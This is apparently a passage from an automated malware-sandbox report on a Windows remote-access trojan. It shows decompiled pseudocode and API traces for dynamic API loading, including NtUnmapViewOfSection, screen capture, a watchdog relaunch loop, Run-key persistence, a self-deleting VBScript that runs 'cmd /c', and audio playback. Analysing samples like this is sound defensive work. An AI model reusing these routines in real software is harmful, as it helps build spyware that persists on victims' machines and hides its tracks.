                              					 *0x46bd20 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                              				}
                              				 *0x46bd28 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                              				 *0x46bd14 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                              				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                              				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                              				 *0x46bd24 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                              				 *0x46bd18 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                              				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                              				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                              				 *0x46bd1c = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                              				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                              				 *0x46bd10 = _t24;
                              				return _t24;
                              			}

                              APIs
                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00000000,0046C548,00000001,0040C86E), ref: 0040D085
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D08E
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040D0A9
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0AC
                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040D0BD
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0C0
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040D0DA
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0DD
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040D0EE
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0F1
                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040D102
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D105
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040D116
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D119
                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040D12A
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D12D
                              • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040D13E
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D141
                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040D152
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D155
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040D166
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D169
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040D17A
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D17D
                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040D18E
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D191
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040D19F
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D1A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: AddressProc$HandleModule$LibraryLoad
                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                              • API String ID: 551388010-3474354060
                              • Opcode ID: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
                              • Instruction ID: 029b01f258c961e34356c9f3640987a8bc8548ac7ec401a199099fba32c80220
                              • Opcode Fuzzy Hash: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
                              • Instruction Fuzzy Hash: 10218EA0E8035875DA20BBB66C4DE1B2E58DA84B957214C27F205D7191FBFCC5408FAF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E004142A5(void* __ecx, char __edx, void* __eflags, signed int _a4) {
                              				void* _v12;
                              				char _v13;
                              				struct HDC__* _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				int _v32;
                              				int _v36;
                              				struct HDC__* _v40;
                              				void* _v46;
                              				intOrPtr _v50;
                              				intOrPtr _v54;
                              				char _v56;
                              				char _v80;
                              				intOrPtr _v84;
                              				struct tagCURSORINFO _v100;
                              				signed int _v106;
                              				signed int _v108;
                              				long _v116;
                              				long _v120;
                              				char _v124;
                              				struct _ICONINFO _v144;
                              				char _v168;
                              				void* __ebx;
                              				int _t114;
                              				void* _t115;
                              				void* _t116;
                              				void* _t120;
                              				int _t127;
                              				void* _t128;
                              				signed char _t140;
                              				long _t146;
                              				void* _t147;
                              				int _t149;
                              				void* _t157;
                              				void* _t186;
                              				void* _t188;
                              				void* _t194;
                              				int _t199;
                              				void* _t204;
                              				void* _t223;
                              				signed int _t226;
                              				struct HDC__* _t228;
                              				struct HDC__* _t232;
                              				struct tagBITMAPINFO* _t234;
                              				void* _t235;
                              				int _t241;
                              
                              				_v13 = __edx;
                              				_t194 = __ecx;
                              				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
                              				_v20 = _t232;
                              				_t228 = CreateCompatibleDC(_t232);
                              				_v40 = _t228;
                              				_v32 = E004146DC( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                              				_t114 = E00414728( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                              				_t199 = _v32;
                              				_v36 = _t114;
                              				if(_t199 != 0 || _t114 != 0) {
                              					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
                              					_v12 = _t115;
                              					__eflags = _t115;
                              					if(_t115 != 0) {
                              						_t116 = SelectObject(_t228, _t115);
                              						__eflags = _t116;
                              						if(_t116 != 0) {
                              							_v28 = _v28 & 0x00000000;
                              							_v24 = _v24 & 0x00000000;
                              							E00414769( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
                              							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
                              							__eflags = _t120;
                              							if(_t120 == 0) {
                              								goto L7;
                              							}
                              							__eflags = _v13;
                              							if(_v13 != 0) {
                              								_v100.cbSize = 0x14;
                              								_t186 = GetCursorInfo( &_v100);
                              								__eflags = _t186;
                              								if(_t186 != 0) {
                              									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
                              									__eflags = _t188;
                              									if(_t188 != 0) {
                              										_t241 = _v84 - _v144.yHotspot - _v24;
                              										__eflags = _t241;
                              										DeleteObject(_v144.hbmColor);
                              										DeleteObject(_v144.hbmMask);
                              										_t228 = _v40;
                              										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
                              										_t232 = _v20;
                              									}
                              								}
                              							}
                              							_push( &_v124);
                              							_t127 = 0x18;
                              							_t128 = GetObjectA(_v12, _t127, ??);
                              							__eflags = _t128;
                              							if(_t128 == 0) {
                              								goto L7;
                              							} else {
                              								_t226 = _v106 * _v108 & 0x0000ffff;
                              								__eflags = _t226 - 1;
                              								if(_t226 != 1) {
                              									_push(4);
                              									_pop(1);
                              									_a4 = 1;
                              									__eflags = _t226 - 1;
                              									if(_t226 <= 1) {
                              										L24:
                              										__eflags = 1 << 1;
                              										_push(0x2eb6edc);
                              										L25:
                              										_t234 = LocalAlloc(0x40, ??);
                              										_t204 = 0x18;
                              										_t234->bmiHeader = 0x28;
                              										_t234->bmiHeader.biWidth = _v120;
                              										_t234->bmiHeader.biHeight = _v116;
                              										_t234->bmiHeader.biPlanes = _v108;
                              										_t234->bmiHeader.biBitCount = _v106;
                              										_t140 = _a4;
                              										__eflags = _t140 - _t204;
                              										if(_t140 < _t204) {
                              											__eflags = 1;
                              											_t234->bmiHeader.biClrUsed = 1 << _t140;
                              										}
                              										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
                              										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
                              										asm("cdq");
                              										_t227 = _t226 & 0x00000007;
                              										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
                              										_t234->bmiHeader.biSizeImage = _t146;
                              										_t147 = GlobalAlloc(0, _t146);
                              										_a4 = _t147;
                              										__eflags = _t147;
                              										if(_t147 != 0) {
                              											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
                              											__eflags = _t149;
                              											if(_t149 != 0) {
                              												_v56 = 0x4d42;
                              												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                              												_v50 = 0;
                              												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                              												__eflags = _t157;
                              												_v46 = _t157;
                              												E004020B5(_t194,  &_v80);
                              												E004020B5(_t194,  &_v168);
                              												E004024FD(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
                              												E00403416( &_v80);
                              												E004024FD(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
                              												E00403416( &_v80);
                              												_t235 = _a4;
                              												E004024FD(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
                              												E00403416( &_v80);
                              												DeleteObject(_v12);
                              												GlobalFree(_t235);
                              												DeleteDC(_v20);
                              												DeleteDC(_t228);
                              												E00402024(_t194, _t194, __eflags,  &_v168);
                              												L00401FA7();
                              												L00401FA7();
                              												goto L32;
                              											}
                              											DeleteDC(_v20);
                              											DeleteDC(_t228);
                              											DeleteObject(_v12);
                              											GlobalFree(_a4);
                              											goto L2;
                              										} else {
                              											_push(_v20);
                              											L8:
                              											DeleteDC();
                              											DeleteDC(_t228);
                              											_push(_v12);
                              											goto L5;
                              										}
                              									}
                              									_push(8);
                              									_pop(1);
                              									_a4 = 1;
                              									__eflags = _t226 - 1;
                              									if(_t226 <= 1) {
                              										goto L24;
                              									}
                              									_push(0x10);
                              									_pop(1);
                              									_a4 = 1;
                              									__eflags = _t226 - 1;
                              									if(_t226 <= 1) {
                              										goto L24;
                              									}
                              									_t223 = 0x18;
                              									__eflags = _t226 - _t223;
                              									if(_t226 > _t223) {
                              										_push(0x20);
                              										_pop(1);
                              										L23:
                              										_a4 = 1;
                              										goto L24;
                              									}
                              									_a4 = _t223;
                              									_push(0x28);
                              									goto L25;
                              								}
                              								goto L23;
                              							}
                              						}
                              						L7:
                              						_push(_t232);
                              						goto L8;
                              					} else {
                              						DeleteDC(_t232);
                              						DeleteDC(_t228);
                              						_push(0);
                              						L5:
                              						DeleteObject();
                              						goto L2;
                              					}
                              				} else {
                              					L2:
                              					E00402064(_t194, _t194, 0x45f6ac);
                              					L32:
                              					return _t194;
                              				}
                              			}

                              APIs
                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
                              • CreateCompatibleDC.GDI32(00000000), ref: 004142CC
                              • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041431A
                              • DeleteDC.GDI32(00000000), ref: 0041432E
                              • DeleteDC.GDI32(00000000), ref: 00414331
                              • DeleteObject.GDI32(?), ref: 00414335
                              • SelectObject.GDI32(00000000,00000000), ref: 0041433F
                              • DeleteDC.GDI32(00000000), ref: 00414350
                              • DeleteDC.GDI32(00000000), ref: 00414353
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041438F
                              • GetCursorInfo.USER32(?,?,?), ref: 004143AA
                              • GetIconInfo.USER32(?,?), ref: 004143BE
                              • DeleteObject.GDI32(?), ref: 004143E3
                              • DeleteObject.GDI32(?), ref: 004143EC
                              • DrawIcon.USER32 ref: 004143FB
                              • GetObjectA.GDI32(?,00000018,?), ref: 0041440F
                              • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414475
                              • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 004144DE
                              • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414502
                              • DeleteDC.GDI32(?), ref: 00414515
                              • DeleteDC.GDI32(00000000), ref: 00414518
                              • DeleteObject.GDI32(?), ref: 0041451D
                              • GlobalFree.KERNEL32 ref: 00414527
                              • DeleteObject.GDI32(?), ref: 004145CC
                              • GlobalFree.KERNEL32 ref: 004145D3
                              • DeleteDC.GDI32(?), ref: 004145E2
                              • DeleteDC.GDI32(00000000), ref: 004145E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDrawLocalSelectStretch
                              • String ID: DISPLAY$d?A
                              • API String ID: 860969378-979833423
                              • Opcode ID: 473d270f5943e72469e1eb6f635e34cfdefb73a496e44f2443727fb2ad1c5628
                              • Instruction ID: 5f48c5219878f18165c8a10fe86ed1b3fa979366dd0a80e665ef025d0f654af7
                              • Opcode Fuzzy Hash: 473d270f5943e72469e1eb6f635e34cfdefb73a496e44f2443727fb2ad1c5628
                              • Instruction Fuzzy Hash: 1AB18075A00319AFDB10DFA0DC45BEEBBB8EF44752F00402AF945E7291DB74AA85CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E0040F785() {
                              				long _v8;
                              				char _v32;
                              				short _v556;
                              				short _v1076;
                              				short _v1596;
                              				short _v2116;
                              				void* _t27;
                              				void* _t28;
                              				void* _t31;
                              				long _t37;
                              				int _t41;
                              				long _t50;
                              				void* _t55;
                              				void* _t68;
                              				void* _t70;
                              				int _t71;
                              				void* _t72;
                              				long _t73;
                              				void* _t110;
                              				void* _t112;
                              				void* _t115;
                              				void* _t116;
                              
                              				_t71 = 0;
                              				_v8 = _t73;
                              				CreateMutexA(0, 1, "Mutex_RemWatchdog");
                              				GetModuleFileNameW(0,  &_v2116, 0x104);
                              				_t27 = E00402469();
                              				_t28 = L00401F75(0x46c560);
                              				_t108 = 0x46c518;
                              				_t31 = E00410420(L00401F75(0x46c518), "exepath",  &_v556, 0x208, _t28, _t27);
                              				_t116 = _t115 + 0x14;
                              				if(_t31 != 0) {
                              					E004020B5(0,  &_v32);
                              					if(E00417334( &_v556,  &_v32) == 0) {
                              						goto L1;
                              					}
                              					_t110 = OpenProcess(0x100000, 0, _v8);
                              					WaitForSingleObject(_t110, 0xffffffff);
                              					CloseHandle(_t110);
                              					_t37 = GetCurrentProcessId();
                              					if(E004105A0(0x46c518, L00401F75(0x46c518), "WDH", _t37) == 0) {
                              						L18:
                              						_push(1);
                              						L2:
                              						ExitProcess();
                              					}
                              					_t108 = ShellExecuteW;
                              					do {
                              						_t41 = PathFileExistsW( &_v556);
                              						_t42 =  &_v556;
                              						if(_t41 != 0) {
                              							L11:
                              							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
                              							L12:
                              							do {
                              								_t72 = E00410275(L00401F75(0x46c518), "WD",  &_v8);
                              								_t122 = _t72;
                              								if(_t72 == 0) {
                              									Sleep(0x1f4);
                              								} else {
                              									E004106D2(L00401F75(0x46c518), _t122, "WD");
                              								}
                              							} while (_t72 == 0);
                              							goto L17;
                              						}
                              						_t55 = E00402469();
                              						if(E0041729F(L00401F75( &_v32), _t55,  &_v556, _t71) == 0) {
                              							E00431810(_t108,  &_v1596, _t71, 0x208);
                              							_t116 = _t116 + 0xc;
                              							GetTempPathW(0x104,  &_v1596);
                              							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
                              							lstrcatW( &_v1076, L".exe");
                              							_t68 = E00402469();
                              							_t70 = E0041729F(L00401F75( &_v32), _t68,  &_v1076, _t71);
                              							__eflags = _t70;
                              							if(_t70 == 0) {
                              								goto L12;
                              							}
                              							_t42 =  &_v1076;
                              							goto L11;
                              						}
                              						_t42 =  &_v556;
                              						goto L11;
                              						L17:
                              						_t71 = 0;
                              						_t112 = OpenProcess(0x100000, 0, _v8);
                              						WaitForSingleObject(_t112, 0xffffffff);
                              						CloseHandle(_t112);
                              						_t50 = GetCurrentProcessId();
                              					} while (E004105A0(0x46c518, L00401F75(0x46c518), "WDH", _t50) != 0);
                              					goto L18;
                              				}
                              				L1:
                              				_push(_t71);
                              				goto L2;
                              			}

                              APIs
                              • CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0046C578,0046C518,00000000), ref: 0040F79E
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F7B1
                                • Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 0041043C
                                • Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410455
                                • Part of subcall function 00410420: RegCloseKey.ADVAPI32(00000000), ref: 00410460
                              • ExitProcess.KERNEL32 ref: 0040F7F8
                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F821
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F82C
                              • CloseHandle.KERNEL32(00000000), ref: 0040F833
                              • GetCurrentProcessId.KERNEL32 ref: 0040F839
                              • PathFileExistsW.SHLWAPI(?), ref: 0040F86A
                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040F939
                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F98F
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F99A
                              • CloseHandle.KERNEL32(00000000), ref: 0040F9A1
                              • GetCurrentProcessId.KERNEL32 ref: 0040F9A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
                              • String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
                              • API String ID: 2645874385-232273909
                              • Opcode ID: 000e77ad3a4b68f1b65fdd9cf93c06e27b4433b195a74a56e8cefade3b9146bf
                              • Instruction ID: 39908bf11b75da137bed33461dc6f1560e7a678cbeca7b59d94bc4d120dac13a
                              • Opcode Fuzzy Hash: 000e77ad3a4b68f1b65fdd9cf93c06e27b4433b195a74a56e8cefade3b9146bf
                              • Instruction Fuzzy Hash: FF51F571A003197BDB10ABA09C49EFF336C9B04755F10007BB501A32E2EF788E498B5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E0040B465(char _a4) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				char _v148;
                              				char _v172;
                              				short _v692;
                              				void* __ebx;
                              				void* __edi;
                              				void* __ebp;
                              				void* _t53;
                              				void* _t54;
                              				void* _t57;
                              				signed int _t61;
                              				void* _t62;
                              				void* _t78;
                              				void* _t79;
                              				void* _t92;
                              				void* _t93;
                              				signed char _t134;
                              				void* _t243;
                              				void* _t245;
                              				void* _t246;
                              				void* _t247;
                              
                              				L0040FB4B();
                              				if( *0x46a9d4 != 0x30) {
                              					L00409D75();
                              				}
                              				_t243 =  *0x46bd6b - 1; // 0x0
                              				if(_t243 == 0) {
                              					L00414D1D(_t243);
                              				}
                              				if( *0x46ba75 != 0) {
                              					E004170AC(L00401ECB(0x46c0e0));
                              				}
                              				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                              				_t245 =  *0x46bb06 - 1; // 0x0
                              				if(_t245 == 0) {
                              					E0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
                              				}
                              				_t246 =  *0x46baff - 1; // 0x0
                              				if(_t246 == 0) {
                              					E0041074C(0x80000002, _t231, L00401ECB(0x46c4e8));
                              				}
                              				_t247 =  *0x46bb04 - 1; // 0x0
                              				if(_t247 == 0) {
                              					E0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
                              				}
                              				_t53 = E00402469();
                              				_t54 = L00401F75(0x46c560);
                              				_t57 = E00410420(L00401F75(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
                              				_t248 = _t57;
                              				if(_t57 == 0) {
                              					GetModuleFileNameW(0,  &_v692, 0x208);
                              				}
                              				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
                              				_t61 = SetFileAttributesW( &_v692, 0x80);
                              				_t140 = 0x46c530;
                              				asm("sbb bl, bl");
                              				_t134 =  ~_t61 & 0x00000001;
                              				_t62 = E004074E6(_t248);
                              				_t249 = _t62;
                              				if(_t62 != 0) {
                              					_t140 = 0x46c530;
                              					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
                              				}
                              				E00403086(_t134,  &_v124, E0040425F(_t134,  &_v52, E0043918F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
                              				L00401ED0();
                              				E004043E5(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040425F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                              				L00401ED0();
                              				_t250 = _t134;
                              				if(_t134 != 0) {
                              					E004032F1(E00403086(_t134,  &_v52, E004043E5(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040425F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
                              					L00401ED0();
                              					L00401ED0();
                              					L00401ED0();
                              				}
                              				E004032F1(E00403086(_t134,  &_v100, E00403086(_t134,  &_v76, E0040425F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				_t251 = _t134;
                              				if(_t134 != 0) {
                              					E0040766E(_t134,  &_v28, 0, L"wend\n");
                              				}
                              				_t78 = E004074E6(_t251);
                              				_t252 = _t78;
                              				if(_t78 != 0) {
                              					E004032F1(E00403086(0x45f714,  &_v100, L00409E6B( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
                              					L00401ED0();
                              					L00401ED0();
                              				}
                              				_t79 = E0040425F(0x45f714,  &_v172, L"\"\"\", 0");
                              				E004032F1(E00403086(0x45f714,  &_v100, E00403010( &_v76, E00404409(0x45f714,  &_v52, E0040425F(0x45f714,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				E0040766E(0x45f714,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                              				_t92 = L00401ECB( &_v124);
                              				_t93 = E00402469();
                              				if(E0041729F(L00401ECB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401ECB( &_v124), 0x45f714, 0x45f714, 0) > 0x20) {
                              					ExitProcess(0);
                              				}
                              				L00401ED0();
                              				L00401ED0();
                              				return L00401ED0();
                              			}

                              APIs
                                • Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,?,0040B118), ref: 0040FB5B
                                • Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF,?,0040B118), ref: 0040FB6E
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B55E
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B571
                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B589
                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B5B7
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,?,0040B126), ref: 00409D84
                                • Part of subcall function 00409D75: UnhookWindowsHookEx.USER32(00000000), ref: 00409D94
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(Function_00008832,00000000,?,0040B126), ref: 00409DA6
                                • Part of subcall function 0041729F: CreateFileW.KERNEL32(00405D1C,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,004173C9,00000000,00000000), ref: 004172DE
                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B7DA
                              • ExitProcess.KERNEL32 ref: 0040B7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                              • API String ID: 1861856835-1536747724
                              • Opcode ID: f8555620d053e2ba0ee88039e02dcc354c2519fc645e296044691fa67c3c0157
                              • Instruction ID: cb4c9db422e66655c9b91f3ac858345e6386e01706fd0e6f849a483e47031bcc
                              • Opcode Fuzzy Hash: f8555620d053e2ba0ee88039e02dcc354c2519fc645e296044691fa67c3c0157
                              • Instruction Fuzzy Hash: 9891B131A101186ACB14FB62DCA69EF7769AF50348F14007FF406731E2EF781E4A869E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E0041636B(void* __ecx, void* __edx, char _a4) {
                              				char _v24;
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t25;
                              				void* _t28;
                              				void* _t43;
                              				void* _t60;
                              				void* _t63;
                              				void* _t67;
                              				CHAR* _t89;
                              				void* _t109;
                              				CHAR* _t110;
                              				void* _t111;
                              				void* _t114;
                              				void* _t118;
                              
                              				_t103 = __edx;
                              				_t67 = __ecx;
                              				_t109 = __edx;
                              				if(E004165B1( &_a4, __ecx, __ecx) == 0xffffffff) {
                              					_t63 = L00401ECB( &_a4);
                              					_t103 = 0x30;
                              					L00401EDA( &_a4, 0x30, _t111, E004179B3( &_v28, 0x30, _t63));
                              					L00401ED0();
                              				}
                              				_t25 = E00402469();
                              				_t120 = _t25;
                              				if(_t25 == 0) {
                              					__eflags = PathFileExistsW(L00401ECB( &_a4));
                              					if(__eflags != 0) {
                              						goto L4;
                              					} else {
                              						E00402064(_t67, _t114 - 0x18, 0x45f6ac);
                              						_push(0xa8);
                              						L00404A6E(_t67, 0x46ca00, _t103, __eflags);
                              					}
                              				} else {
                              					_t60 = L00401ECB( &_a4);
                              					_t118 = _t114 - 0x18;
                              					E004020CC(_t67, _t118, _t103, _t120, _t109);
                              					E004173A6(_t60);
                              					_t114 = _t118 + 0x18;
                              					L4:
                              					_t28 = L00416C32( &_v124, _t67);
                              					_t108 = E00403010( &_v28, E00403086(_t67,  &_v76, L00409E6B( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
                              					E00403086(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
                              					L00401ED0();
                              					L00401ED0();
                              					L00401ED0();
                              					L00401ED0();
                              					mciSendStringW(L00401ECB( &_v52), 0, 0, 0);
                              					mciSendStringA("play audio", 0, 0, 0);
                              					_t115 = _t114 - 0x18;
                              					E00402064(0, _t114 - 0x18, 0x45f6ac);
                              					_push(0xa9);
                              					L00404A6E(0, 0x46ca00, _t32, 0);
                              					_t43 = CreateEventA(0, 1, 0, 0);
                              					while(1) {
                              						L5:
                              						 *0x46bea8 = _t43;
                              						while(1) {
                              							_t122 = _t43;
                              							if(_t43 == 0) {
                              								break;
                              							}
                              							__eflags =  *0x46bea6; // 0x0
                              							if(__eflags != 0) {
                              								mciSendStringA("pause audio", 0, 0, 0);
                              								 *0x46bea6 = 0;
                              							}
                              							__eflags =  *0x46bea5; // 0x0
                              							if(__eflags != 0) {
                              								mciSendStringA("resume audio", 0, 0, 0);
                              								 *0x46bea5 = 0;
                              							}
                              							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
                              							_t108 =  &_v24;
                              							_t110 = "stopped";
                              							_t89 = 0;
                              							while(1) {
                              								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
